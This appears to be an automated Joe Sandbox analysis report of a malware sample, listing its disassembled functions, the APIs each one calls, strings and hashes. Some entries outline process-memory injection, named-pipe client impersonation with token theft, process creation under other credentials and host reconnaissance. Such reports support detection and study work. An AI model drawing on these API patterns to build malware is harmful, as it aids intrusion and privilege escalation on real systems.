Instruction Fuzzy Hash: 9B110336909B414FD719EB68F8923297BA0FB83325F160A6DD0178B2F1D6B4984087A1

Function 006C5950 Relevance: 13.6, APIs: 9, Instructions: 67COMMONLIBRARYCODE

Download Yara Rule

APIs

_errno.LIBCMT ref: 006C597B

Part of subcall function 006BFBCC: _getptd_noexit.LIBCMT ref: 006BFBD0

__doserrno.LIBCMT ref: 006C5973

Part of subcall function 006BFB5C: _getptd_noexit.LIBCMT ref: 006BFB60

__lock_fhandle.LIBCMT ref: 006C59BF
_lseek_nolock.LIBCMT ref: 006C59D8

Memory Dump Source

Source File: 00000000.00000002.4147551380.00000000006A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.4147551380.00000000006E5000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4147551380.00000000006E8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4147551380.00000000006EC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4147551380.00000000006F0000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_THsSNYblMw.jbxd

Yara matches

Similarity

API ID: _getptd_noexit$__doserrno__lock_fhandle_errno_lseek_nolock
String ID:
API String ID: 310312816-0
Opcode ID: 4833c2b8665bf31d984187e315fea37269f990f532a28b2b0e30fdfe739480cc
Instruction ID: dbbf784a271e12eb817c3574d67c5a4c91a8f019f9011df6de59f161625fb30c
Opcode Fuzzy Hash: 4833c2b8665bf31d984187e315fea37269f990f532a28b2b0e30fdfe739480cc
Instruction Fuzzy Hash: 6011E7B2710A8085D7412FA6DC91B7E7653EB807A1F49462DEA17073A1DBB8D8C28718

Function 006C5AC8 Relevance: 13.6, APIs: 9, Instructions: 67COMMONLIBRARYCODE

Download Yara Rule

APIs

_errno.LIBCMT ref: 006C5AF3

Part of subcall function 006BFBCC: _getptd_noexit.LIBCMT ref: 006BFBD0

__doserrno.LIBCMT ref: 006C5AEB

Part of subcall function 006BFB5C: _getptd_noexit.LIBCMT ref: 006BFB60

__lock_fhandle.LIBCMT ref: 006C5B37
_lseeki64_nolock.LIBCMT ref: 006C5B50

Memory Dump Source

Source File: 00000000.00000002.4147551380.00000000006A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.4147551380.00000000006E5000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4147551380.00000000006E8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4147551380.00000000006EC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4147551380.00000000006F0000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_THsSNYblMw.jbxd

Yara matches

Similarity

API ID: _getptd_noexit$__doserrno__lock_fhandle_errno_lseeki64_nolock
String ID:
API String ID: 4140391395-0
Opcode ID: 56b34c18a28ca68a05c0e5a09bbf2d31e6e5b89d40deec44bc05dc379c93aa6f
Instruction ID: 5cb71029a5fb8aadb5972505b8f24a1ae7edbfb129d56dfb39892fc47a1dcaba
Opcode Fuzzy Hash: 56b34c18a28ca68a05c0e5a09bbf2d31e6e5b89d40deec44bc05dc379c93aa6f
Instruction Fuzzy Hash: 9811C3A2200A4445D6452F25DC61B7D7A53E790BF1F09472DEA3A0B7E2CB7898828728

Function 0352D2F3 Relevance: 12.6, APIs: 10, Instructions: 116COMMONLIBRARYCODE

Download Yara Rule

APIs

free.LIBCMT ref: 0352D321

Part of subcall function 0352C5CF: _errno.LIBCMT ref: 0352C5EF

free.LIBCMT ref: 0352D336
free.LIBCMT ref: 0352D357
free.LIBCMT ref: 0352D36C
free.LIBCMT ref: 0352D380
free.LIBCMT ref: 0352D38C
free.LIBCMT ref: 0352D3B7
free.LIBCMT ref: 0352D3D8
free.LIBCMT ref: 0352D3F1
free.LIBCMT ref: 0352D422

Memory Dump Source

Source File: 00000000.00000002.4147925142.0000000003510000.00000040.00001000.00020000.00000000.sdmp, Offset: 03510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3510000_THsSNYblMw.jbxd

Yara matches

Similarity

API ID: free$_errno
String ID:
API String ID: 2288870239-0
Opcode ID: 414a355009f71752a80ca6a1a86f772915b575b7b474327a6fec3fd0861578bf
Instruction ID: 8b2506711bf2561a8328472f31018b81540ffe6d59db628f22c3f1385d7d58da
Opcode Fuzzy Hash: 414a355009f71752a80ca6a1a86f772915b575b7b474327a6fec3fd0861578bf
Instruction Fuzzy Hash: E2318B32365E1A8FEB64EB68F894B6876F1FBA9315F58412D8019C71F0DA6C8845C711

Function 00401D50 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 185COMMON

Download Yara Rule

APIs

VirtualQuery.KERNEL32 ref: 00401E69

Strings

VirtualQuery failed for %d bytes at address %p, xrefs: 00401FBB
VirtualProtect failed with code 0x%x, xrefs: 00401F56
Address %p has no image-section, xrefs: 00401DC0
Mingw-w64 runtime failure:, xrefs: 00401D88

Memory Dump Source

Source File: 00000000.00000002.4147472908.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.4147461082.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4147472908.000000000040C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4147501523.000000000040D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4147512918.000000000040E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.4147525678.000000000040F000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_THsSNYblMw.jbxd

Similarity

API ID: QueryVirtual
String ID: VirtualProtect failed with code 0x%x$ VirtualQuery failed for %d bytes at address %p$Address %p has no image-section$Mingw-w64 runtime failure:
API String ID: 1804819252-1534286854
Opcode ID: eb96bce5aba28f4b7fd5428a67a7dc765e3f26f51d184c285f7c9c3ca2c1b9e4
Instruction ID: 10d76aa513752d408286ffc26ec959f6f169e193d9772deefbdc98a11bb0eab9
Opcode Fuzzy Hash: eb96bce5aba28f4b7fd5428a67a7dc765e3f26f51d184c285f7c9c3ca2c1b9e4
Instruction Fuzzy Hash: 2C51DFB2701B4086DB109F26E94475E77A1F799BA4F58423AEF98233E1EA3CC485C748

Function 006C42F4 Relevance: 12.1, APIs: 8, Instructions: 67COMMONLIBRARYCODE

Download Yara Rule

APIs

_errno.LIBCMT ref: 006C431F

Part of subcall function 006BFBCC: _getptd_noexit.LIBCMT ref: 006BFBD0

__doserrno.LIBCMT ref: 006C4317

Part of subcall function 006BFB5C: _getptd_noexit.LIBCMT ref: 006BFB60

__lock_fhandle.LIBCMT ref: 006C4363

Memory Dump Source

Source File: 00000000.00000002.4147551380.00000000006A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.4147551380.00000000006E5000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4147551380.00000000006E8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4147551380.00000000006EC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4147551380.00000000006F0000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_THsSNYblMw.jbxd

Yara matches

Similarity

API ID: _getptd_noexit$__doserrno__lock_fhandle_errno
String ID:
API String ID: 2611593033-0
Opcode ID: 70799e69bd9062a04ea1f8efc400af3973f5b9fc7b5330ceef23c38fc380ada8
Instruction ID: 9e3fa641b91027ebbb53f11db682453bbf3c3c923187f173685b924f7bf72bf7
Opcode Fuzzy Hash: 70799e69bd9062a04ea1f8efc400af3973f5b9fc7b5330ceef23c38fc380ada8
Instruction Fuzzy Hash: 64110A727106C046D751AF66DC61B7D7553EBC0BA1F09452DEA19077E2CFB8C8818718

Function 006C85FC Relevance: 12.1, APIs: 8, Instructions: 63COMMONLIBRARYCODE

Download Yara Rule

APIs

_errno.LIBCMT ref: 006C8615

Part of subcall function 006BFBCC: _getptd_noexit.LIBCMT ref: 006BFBD0

__lock_fhandle.LIBCMT ref: 006C865D
FlushFileBuffers.KERNEL32 ref: 006C8678
GetLastError.KERNEL32 ref: 006C8682
__doserrno.LIBCMT ref: 006C8692
_errno.LIBCMT ref: 006C8699

Memory Dump Source

Source File: 00000000.00000002.4147551380.00000000006A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.4147551380.00000000006E5000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4147551380.00000000006E8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4147551380.00000000006EC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4147551380.00000000006F0000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_THsSNYblMw.jbxd

Yara matches

Similarity

API ID: _errno$BuffersErrorFileFlushLast__doserrno__lock_fhandle_getptd_noexit
String ID:
API String ID: 2289611984-0
Opcode ID: 04127f76b53980034013af0f42a669dd87838fa1dff73494bf33a75188a75c24
Instruction ID: a98bc9b9d4bf7e849486b7dd0fc4581b021bb3bb99b2a1ef913d9a65c7255fcc
Opcode Fuzzy Hash: 04127f76b53980034013af0f42a669dd87838fa1dff73494bf33a75188a75c24
Instruction Fuzzy Hash: 16110B717007414DD7656F66DCA4B7D7A53E781760F19012DEA154B3E2CFB8C8818758

Function 006C3B18 Relevance: 12.1, APIs: 8, Instructions: 57COMMONLIBRARYCODE

Download Yara Rule

APIs

_errno.LIBCMT ref: 006C3B39

Part of subcall function 006BFBCC: _getptd_noexit.LIBCMT ref: 006BFBD0

__doserrno.LIBCMT ref: 006C3B31

Part of subcall function 006BFB5C: _getptd_noexit.LIBCMT ref: 006BFB60

__lock_fhandle.LIBCMT ref: 006C3B7D
_close_nolock.LIBCMT ref: 006C3B90

Memory Dump Source

Source File: 00000000.00000002.4147551380.00000000006A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.4147551380.00000000006E5000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4147551380.00000000006E8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4147551380.00000000006EC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4147551380.00000000006F0000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_THsSNYblMw.jbxd

Yara matches

Similarity

API ID: _getptd_noexit$__doserrno__lock_fhandle_close_nolock_errno
String ID:
API String ID: 4060740672-0
Opcode ID: d703984814e996e83ed98980a5e84da43d7f727c49fba6facbc0338df0550374
Instruction ID: a0d7536a730d4a66d82c2199577ff7f5dbd69286fbba735961b07c09de911a0b
Opcode Fuzzy Hash: d703984814e996e83ed98980a5e84da43d7f727c49fba6facbc0338df0550374
Instruction Fuzzy Hash: 6E11597220079046D3157F35EC91B7D7A23E7A0761F199A3DEA194B3E2CAB8CC82871C

Function 03513A53 Relevance: 11.6, APIs: 9, Instructions: 305COMMON

Download Yara Rule

APIs

malloc.LIBCMT ref: 03513AF0

Part of subcall function 0352C60F: _FF_MSGBANNER.LIBCMT ref: 0352C63F
Part of subcall function 0352C60F: _NMSG_WRITE.LIBCMT ref: 0352C649
Part of subcall function 0352C60F: _callnewh.LIBCMT ref: 0352C67D
Part of subcall function 0352C60F: _errno.LIBCMT ref: 0352C688
Part of subcall function 0352C60F: _errno.LIBCMT ref: 0352C693

malloc.LIBCMT ref: 03513AFA

Part of subcall function 0352C60F: _callnewh.LIBCMT ref: 0352C6A3
Part of subcall function 0352C60F: _errno.LIBCMT ref: 0352C6A8

malloc.LIBCMT ref: 03513B05
free.LIBCMT ref: 03513CC5
free.LIBCMT ref: 03513CCD
free.LIBCMT ref: 03513CD5

Part of subcall function 03514937: malloc.LIBCMT ref: 03514981
Part of subcall function 03514937: malloc.LIBCMT ref: 0351498C
Part of subcall function 03514937: free.LIBCMT ref: 03514A73
Part of subcall function 03514937: free.LIBCMT ref: 03514A7B

free.LIBCMT ref: 03513CE1
free.LIBCMT ref: 03513CEE
free.LIBCMT ref: 03513CFB

Memory Dump Source

Source File: 00000000.00000002.4147925142.0000000003510000.00000040.00001000.00020000.00000000.sdmp, Offset: 03510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3510000_THsSNYblMw.jbxd

Yara matches

Similarity

API ID: free$malloc$_errno$_callnewh
String ID:
API String ID: 4160633307-0
Opcode ID: 793386e24770309d8645233254a04ddae00760abb9c1b1c367d4536306e412bf
Instruction ID: 53a7024ca748c025738001a75ec9b4d4bb9d4957a352131a20e99a72ce95f056
Opcode Fuzzy Hash: 793386e24770309d8645233254a04ddae00760abb9c1b1c367d4536306e412bf
Instruction Fuzzy Hash: FD81F878318B0D4FD729EF2CA46167E77E5FBC5604F44066ED48BC73A2EE20D8128686

Function 006A460C Relevance: 11.5, APIs: 9, Instructions: 201COMMONLIBRARYCODE

Download Yara Rule

APIs

malloc.LIBCMT ref: 006A46A9

Part of subcall function 006BD1C8: _FF_MSGBANNER.LIBCMT ref: 006BD1F8
Part of subcall function 006BD1C8: _NMSG_WRITE.LIBCMT ref: 006BD202
Part of subcall function 006BD1C8: HeapAlloc.KERNEL32 ref: 006BD21D
Part of subcall function 006BD1C8: _callnewh.LIBCMT ref: 006BD236
Part of subcall function 006BD1C8: _errno.LIBCMT ref: 006BD241
Part of subcall function 006BD1C8: _errno.LIBCMT ref: 006BD24C

malloc.LIBCMT ref: 006A46B3

Part of subcall function 006BD1C8: _callnewh.LIBCMT ref: 006BD25C
Part of subcall function 006BD1C8: _errno.LIBCMT ref: 006BD261

malloc.LIBCMT ref: 006A46BE
free.LIBCMT ref: 006A487E
free.LIBCMT ref: 006A4886
free.LIBCMT ref: 006A488E

Part of subcall function 006A54F0: malloc.LIBCMT ref: 006A553A
Part of subcall function 006A54F0: malloc.LIBCMT ref: 006A5545
Part of subcall function 006A54F0: free.LIBCMT ref: 006A562C
Part of subcall function 006A54F0: free.LIBCMT ref: 006A5634

free.LIBCMT ref: 006A489A
free.LIBCMT ref: 006A48A7
free.LIBCMT ref: 006A48B4

Memory Dump Source

Source File: 00000000.00000002.4147551380.00000000006A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.4147551380.00000000006E5000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4147551380.00000000006E8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4147551380.00000000006EC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4147551380.00000000006F0000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_THsSNYblMw.jbxd

Yara matches

Similarity

API ID: free$malloc$_errno$_callnewh$AllocHeap
String ID:
API String ID: 3534990644-0
Opcode ID: 6be82fb75818ba1ee7756e05d45c61c62cba93ed433390d031e696745eb28498
Instruction ID: 1d62ab7ec59f80ea4da432752fc5beac3ef49059f1e232c2fb69ffa77a7d7ff1
Opcode Fuzzy Hash: 6be82fb75818ba1ee7756e05d45c61c62cba93ed433390d031e696745eb28498
Instruction Fuzzy Hash: 686104627147C586DB14AF2AA8407AE7752FBC6BC8F444129DD461BB05EF7CC8468F04

Function 006B9A44 Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 258COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 006B473C: malloc.LIBCMT ref: 006B4758

malloc.LIBCMT ref: 006B9AF0

Part of subcall function 006BD1C8: _FF_MSGBANNER.LIBCMT ref: 006BD1F8
Part of subcall function 006BD1C8: _NMSG_WRITE.LIBCMT ref: 006BD202
Part of subcall function 006BD1C8: HeapAlloc.KERNEL32 ref: 006BD21D
Part of subcall function 006BD1C8: _callnewh.LIBCMT ref: 006BD236
Part of subcall function 006BD1C8: _errno.LIBCMT ref: 006BD241
Part of subcall function 006BD1C8: _errno.LIBCMT ref: 006BD24C

Part of subcall function 006BCA38: malloc.LIBCMT ref: 006BCA88

GetComputerNameExA.KERNEL32 ref: 006B9BB2
GetComputerNameA.KERNEL32 ref: 006B9BE7
GetUserNameA.ADVAPI32 ref: 006B9C1C

Part of subcall function 006AEC4C: WSASocketA.WS2_32 ref: 006AEC7A

malloc.LIBCMT ref: 006B9D35

Strings

VUUU, xrefs: 006B9C78

Memory Dump Source

Source File: 00000000.00000002.4147551380.00000000006A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.4147551380.00000000006E5000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4147551380.00000000006E8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4147551380.00000000006EC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4147551380.00000000006F0000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_THsSNYblMw.jbxd

Yara matches

Similarity

API ID: malloc$Name$Computer_errno$AllocHeapSocketUser_callnewh
String ID: VUUU
API String ID: 632458648-2040033107
Opcode ID: fbc643f024c366e196c72bb08a222e984ec50c02734afe1649aac117ff65b8a6
Instruction ID: de379f6e260d52cc1056f27f4a00504763b350ccdce1b1d1df3eb356765cac27
Opcode Fuzzy Hash: fbc643f024c366e196c72bb08a222e984ec50c02734afe1649aac117ff65b8a6
Instruction Fuzzy Hash: 6C9149A5B0069146EB54EB66E8517FE27A3FB85B80F804029EF494B756DE3DC8C5C328

Function 006B0770 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 128processCOMMON

Download Yara Rule

APIs

Part of subcall function 006B473C: malloc.LIBCMT ref: 006B4758

GetStartupInfoA.KERNEL32 ref: 006B0838

Part of subcall function 006AFA80: MultiByteToWideChar.KERNEL32 ref: 006AFAAD
Part of subcall function 006AFA80: MultiByteToWideChar.KERNEL32 ref: 006AFAD5

GetCurrentDirectoryW.KERNEL32 ref: 006B08C5
GetCurrentDirectoryW.KERNEL32 ref: 006B08D4
CreateProcessWithLogonW.ADVAPI32 ref: 006B092F
GetLastError.KERNEL32 ref: 006B0939

Strings

%s as %s\%s: %d, xrefs: 006B093F

Memory Dump Source

Source File: 00000000.00000002.4147551380.00000000006A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.4147551380.00000000006E5000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4147551380.00000000006E8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4147551380.00000000006EC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4147551380.00000000006F0000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_THsSNYblMw.jbxd

Yara matches

Similarity

API ID: ByteCharCurrentDirectoryMultiWide$CreateErrorInfoLastLogonProcessStartupWithmalloc
String ID: %s as %s\%s: %d
API String ID: 3435635427-816037529
Opcode ID: 92d3955544a4728f5804b16fe6b589a6f18a28386c997154fca0a382d1a098e1
Instruction ID: 6724ec05525e9b92efaf3f4068b5e4e27574d84d7f38c7679d24cc7af158a82b
Opcode Fuzzy Hash: 92d3955544a4728f5804b16fe6b589a6f18a28386c997154fca0a382d1a098e1
Instruction Fuzzy Hash: BE516A72704B8086E760DF56B84079AB7A6F7C9B80F04402AEF8D83B29DF39C4558B44

Function 006B0344 Relevance: 10.6, APIs: 7, Instructions: 109injectionCOMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 006B775C: GetCurrentProcess.KERNEL32 ref: 006B7774

GetLastError.KERNEL32 ref: 006B03B3
ReadProcessMemory.KERNEL32 ref: 006B03E4
ReadProcessMemory.KERNEL32 ref: 006B040C
malloc.LIBCMT ref: 006B044A
free.LIBCMT ref: 006B0493
WriteProcessMemory.KERNEL32 ref: 006B04BA
GetLastError.KERNEL32 ref: 006B04C4

Memory Dump Source

Source File: 00000000.00000002.4147551380.00000000006A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.4147551380.00000000006E5000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4147551380.00000000006E8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4147551380.00000000006EC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4147551380.00000000006F0000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_THsSNYblMw.jbxd

Yara matches

Similarity

API ID: Process$Memory$ErrorLastRead$CurrentWritefreemalloc
String ID:
API String ID: 2416742903-0
Opcode ID: d39206b21eda18042a21def0aae61064133e79866cd27e778fe3c13849b8ffb1
Instruction ID: 26bb9cb43c0b9329e9e1ccb57aea5e6981f49ff202d9b0b91a3b20ce2bf076cb
Opcode Fuzzy Hash: d39206b21eda18042a21def0aae61064133e79866cd27e778fe3c13849b8ffb1
Instruction Fuzzy Hash: 4D4197B1714A51C6E764DB22E8407EF67A2FB84788F005429EF8A47759EF3DC5858B04

Function 0352D197 Relevance: 10.6, APIs: 7, Instructions: 107COMMONLIBRARYCODE

Download Yara Rule

APIs

_errno.LIBCMT ref: 0352D1BD

Part of subcall function 0352F013: _getptd_noexit.LIBCMT ref: 0352F017

_invalid_parameter_noinfo.LIBCMT ref: 0352D1C9
__crtIsPackagedApp.LIBCMT ref: 0352D1DA
_dosmaperr.LIBCMT ref: 0352D224

Memory Dump Source

Source File: 00000000.00000002.4147925142.0000000003510000.00000040.00001000.00020000.00000000.sdmp, Offset: 03510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3510000_THsSNYblMw.jbxd

Yara matches

Similarity

API ID: Packaged__crt_dosmaperr_errno_getptd_noexit_invalid_parameter_noinfo
String ID:
API String ID: 2917016420-0
Opcode ID: 618a4255488f53f113d74fa2bceb050b7581b57bf5715da974d6dc59db4e5fbf
Instruction ID: c9944a1aa9b57e23a067b34dfd58a23b3395b046ab682c5589ab9d845de5e52a
Opcode Fuzzy Hash: 618a4255488f53f113d74fa2bceb050b7581b57bf5715da974d6dc59db4e5fbf
Instruction Fuzzy Hash: 9931C130614B1A4FEB58EF78A8543697AF1FB8A325F14466DA45AC72F0EB38C8418742

Function 03537A43 Relevance: 10.6, APIs: 7, Instructions: 78COMMONLIBRARYCODE

Download Yara Rule

APIs

_errno.LIBCMT ref: 03537A5C

Part of subcall function 0352F013: _getptd_noexit.LIBCMT ref: 0352F017

__lock_fhandle.LIBCMT ref: 03537AA4
__doserrno.LIBCMT ref: 03537AD9
_errno.LIBCMT ref: 03537AE0
_unlock_fhandle.LIBCMT ref: 03537AF0

Memory Dump Source

Source File: 00000000.00000002.4147925142.0000000003510000.00000040.00001000.00020000.00000000.sdmp, Offset: 03510000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3510000_THsSNYblMw.jbxd

Yara matches

Similarity

API ID: _errno$__doserrno__lock_fhandle_getptd_noexit_unlock_fhandle
String ID:
API String ID: 4120058822-0
Opcode ID: 479da2c5f7565818e68d8e53e938d4df86e4340f370b51f2ddc53d5decdb60f2
Instruction ID: 2688ddf40184cdde66daa932dc233448a02a5f4c05085ffc5f7eb07e626c9f3c
Opcode Fuzzy Hash: 479da2c5f7565818e68d8e53e938d4df86e4340f370b51f2ddc53d5decdb60f2
Instruction Fuzzy Hash: 9D21D571E087464EE719EFA8B89422E7BA0FB8F210F05055CD817CB2F1DBB55941C7A1

Function 006BC92C Relevance: 10.6, APIs: 7, Instructions: 75COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 006BC967
OpenProcessToken.ADVAPI32 ref: 006BC98B
GetLastError.KERNEL32 ref: 006BC995

Memory Dump Source

Source File: 00000000.00000002.4147551380.00000000006A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.4147551380.00000000006E5000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4147551380.00000000006E8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4147551380.00000000006EC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4147551380.00000000006F0000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_THsSNYblMw.jbxd

Yara matches

Similarity

API ID: ErrorLast$OpenProcessToken
String ID:
API String ID: 2009710997-0
Opcode ID: c45598522d1ef4c26f254913e2d744c8b6dd039168d3660f363170ff2796bb64
Instruction ID: c2d3fd5376976db9fa3ac282ca2a4fc0448f7f26d66fe8358954d964d9744d8e
Opcode Fuzzy Hash: c45598522d1ef4c26f254913e2d744c8b6dd039168d3660f363170ff2796bb64
Instruction Fuzzy Hash: 6621C571B0470083FB50BF72E49479AA793EBC5BE4F144039AE4A43B65DE39C986CB85

Function 006CDA90 Relevance: 10.6, APIs: 7, Instructions: 72COMMONLIBRARYCODE

Download Yara Rule

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 006CDAC4

Part of subcall function 006BF454: _getptd.LIBCMT ref: 006BF46A
Part of subcall function 006BF454: __updatetlocinfo.LIBCMT ref: 006BF49F
Part of subcall function 006BF454: __updatetmbcinfo.LIBCMT ref: 006BF4C6

_errno.LIBCMT ref: 006CDADF
_invalid_parameter_noinfo.LIBCMT ref: 006CDAEA

Memory Dump Source

Source File: 00000000.00000002.4147551380.00000000006A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.4147551380.00000000006E5000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4147551380.00000000006E8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4147551380.00000000006EC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4147551380.00000000006F0000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_THsSNYblMw.jbxd

Yara matches

Similarity

API ID: Locale$UpdateUpdate::___updatetlocinfo__updatetmbcinfo_errno_getptd_invalid_parameter_noinfo
String ID:
API String ID: 3191669884-0
Opcode ID: 1a3c1f90b9e0765be7a3ca57c2f6cc359d18deb9d03ea8ab1d8e9cb83ec138c3
Instruction ID: 46f16385624d7374c622f6b4dcbb17deae1834bc3f7c3e279d74d1108ed7a59a
Opcode Fuzzy Hash: 1a3c1f90b9e0765be7a3ca57c2f6cc359d18deb9d03ea8ab1d8e9cb83ec138c3
Instruction Fuzzy Hash: FB219FB22047808AD7609F52D480BAEB7A6F754FE0F59413AEE5847B95CB74CC82C704

Function 006B40BC Relevance: 10.6, APIs: 7, Instructions: 52COMMON

Download Yara Rule

APIs

GetTickCount.KERNEL32 ref: 006B40CD
ioctlsocket.WS2_32 ref: 006B40EE
GetTickCount.KERNEL32 ref: 006B4133
ioctlsocket.WS2_32 ref: 006B4155

Memory Dump Source

Source File: 00000000.00000002.4147551380.00000000006A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006A0000, based on PE: true

Associated: 00000000.00000002.4147551380.00000000006E5000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4147551380.00000000006E8000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4147551380.00000000006EC000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.4147551380.00000000006F0000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6a0000_THsSNYblMw.jbxd

Yara matches

Similarity

API ID: CountTickioctlsocket
String ID:
API String ID: 3686034022-0
Opcode ID: df8b12fdec247861816a65c7895da2fd6f05e4dcf0f4f0871b067a3fd8febfec
Instruction ID: 65d72ff9f63cefa079cc086358f8c7b7270680a274185a4341e7eabb92a25266
Opcode Fuzzy Hash: df8b12fdec247861816a65c7895da2fd6f05e4dcf0f4f0871b067a3fd8febfec
Instruction Fuzzy Hash: 92110C71B04A8447F7108B69EC443E97363E784BA8F500125DA5983AA5CF7DCCD9CB04

Function 006AFDAC Relevance: 10.5, APIs: 7, Instructions: 45pipethreadfileCOMMON

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 006AFDD2
ConnectNamedPipe.KERNEL32 ref: 006AFDE8
ReadFile.KERNEL32 ref: 006AFE12
ImpersonateNamedPipeClient.ADVAPI32 ref: 006AFE23
GetCurrentThread.KERNEL32 ref: 006AFE2D
OpenThreadToken.ADVAPI32 ref: 006AFE45
DisconnectNamedPipe.KERNEL32 ref: 006AFE5B

Memory Dump Source

Source File: 00000000.00000002.4147551380.00000000006A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 006A0000, based on PE: true

